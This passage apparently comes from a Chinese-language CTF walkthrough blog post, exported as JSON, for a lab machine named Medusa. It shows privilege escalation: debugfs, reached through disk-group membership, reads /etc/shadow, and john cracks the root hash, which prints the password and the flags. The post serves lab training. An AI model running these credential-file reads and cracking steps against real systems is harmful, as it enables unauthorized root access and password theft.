spectre@medusa:~$ ls -la\ntotal 32\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .\ndrwxr-xr-x 3 root    root    4096 Jan 15  2023 ..\n-rw------- 1 spectre spectre  197 Jan 21  2023 .bash_history\n-rw-r--r-- 1 spectre spectre  220 Jan 15  2023 .bash_logout\n-rw-r--r-- 1 spectre spectre 3526 Jan 15  2023 .bashrc\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .local\n-rw-r--r-- 1 spectre spectre  807 Jan 15  2023 .profile\n-rw------- 1 spectre spectre   44 Jan 18  2023 user.txt\nspectre@medusa:~$ cat user.txt \ngood job!\n\n487a5d1ce02c53fbf60c3abd300d9ff5\nspectre@medusa:~$ sudo -l\n[sudo] password for spectre: \nSorry, user spectre may not run sudo on medusa.\nspectre@medusa:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ && run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nspectre@medusa:~$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process          \nudp            UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*                             \ntcp            LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*                             \ntcp            LISTEN          0               511                                  *:80                                *:*                             \ntcp            LISTEN          0               32                                   *:21                                *:*                             \ntcp            LISTEN          0               128                               [::]:22                             [::]:*                             \nspectre@medusa:~$ whoami;id\nspectre\nuid=1000(spectre) gid=1000(spectre) groups=1000(spectre),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)<\/code><\/pre>\n
\u8bfb\u53d6\u78c1\u76d8\u6587\u4ef6<\/h3>\n
\u53d1\u73b0\u5177\u6709\u78c1\u76d8\u8bfb\u53d6\u6743\u9650<\/p>\n
https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/interesting-groups-linux-pe#disk-group<\/a><\/p>\n
spectre@medusa:~$ \/usr\/sbin\/debugfs -w \/dev\/sda1\ndebugfs 1.46.2 (28-Feb-2021)\ndebugfs:  cat \/root\/root.txt\n\/root\/root.txt: File not found by ext2_lookup \ndebugfs:  cat \/root\/.ssh\/id_rsa\n\/root\/.ssh\/id_rsa: File not found by ext2_lookup \ndebugfs:  cat \/etc\/shadow\nroot:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0\/0nCh3nrIBmwEEHJ6\/kDU45031VFCWc2:19375:0:99999:7:::\ndaemon:*:19372:0:99999:7:::\nbin:*:19372:0:99999:7:::\nsys:*:19372:0:99999:7:::\nsync:*:19372:0:99999:7:::\ngames:*:19372:0:99999:7:::\nman:*:19372:0:99999:7:::\nlp:*:19372:0:99999:7:::\nmail:*:19372:0:99999:7:::\nnews:*:19372:0:99999:7:::\nuucp:*:19372:0:99999:7:::\nproxy:*:19372:0:99999:7:::\nwww-data:*:19372:0:99999:7:::\nbackup:*:19372:0:99999:7:::\nlist:*:19372:0:99999:7:::\nirc:*:19372:0:99999:7:::\ngnats:*:19372:0:99999:7:::\nnobody:*:19372:0:99999:7:::\n_apt:*:19372:0:99999:7:::\nsystemd-network:*:19372:0:99999:7:::\nsystemd-resolve:*:19372:0:99999:7:::\nmessagebus:*:19372:0:99999:7:::\nsystemd-timesync:*:19372:0:99999:7:::\nsshd:*:19372:0:99999:7:::\nspectre:$y$j9T$4TeFHbjRqRC9royagYTTJ\/$KnU7QK1u0\/5fpHHqE\/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::\nsystemd-coredump:!*:19372::::::\nftp:*:19372:0:99999:7:::\ndebugfs:  q<\/code><\/pre>\n
\u7206\u7834root\u5bc6\u7801<\/h3>\n
\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# vim hash.txt  \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nNo password hashes loaded (see FAQ)\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt --format=crypt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (crypt, generic crypt(3) [?\/64])\nCost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes\nCost 2 (algorithm specific iterations) is 1 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nandromeda        (root)     \n1g 0:00:00:19 DONE (2024-04-26 05:49) 0.05005g\/s 187.3p\/s 187.3c\/s 187.3C\/s 19871987..street\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n
\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n
spectre@medusa:~$ su -l root\nPassword: \nroot@medusa:~# ls -la\ntotal 28\ndrwx------  3 root root 4096 Jan 30  2023 .\ndrwxr-xr-x 19 root root 4096 Jan 15  2023 ..\nlrwxrwxrwx  1 root root    9 Jan 15  2023 .bash_history -> \/dev\/null\n-rw-r--r--  1 root root 3526 Jan 17  2023 .bashrc\ndrwxr-xr-x  3 root root 4096 Jan 15  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   53 Jan 18  2023 .rO0t.txt\n-rw-r--r--  1 root root   66 Jan 30  2023 .selected_editor\nroot@medusa:~# cat .rO0t.txt \ncongrats hacker :)\n\n34b1e6fc5e7fe0bfd56ed4b8776c9f5b<\/code><\/pre>\n
\u62ff\u5230rootshell\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Medusa \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/medusa] \u2514\u2500$ rustscan […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-633","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/633","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=633"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/633\/revisions"}],"predecessor-version":[{"id":635,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/633\/revisions\/635"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=633"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=633"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}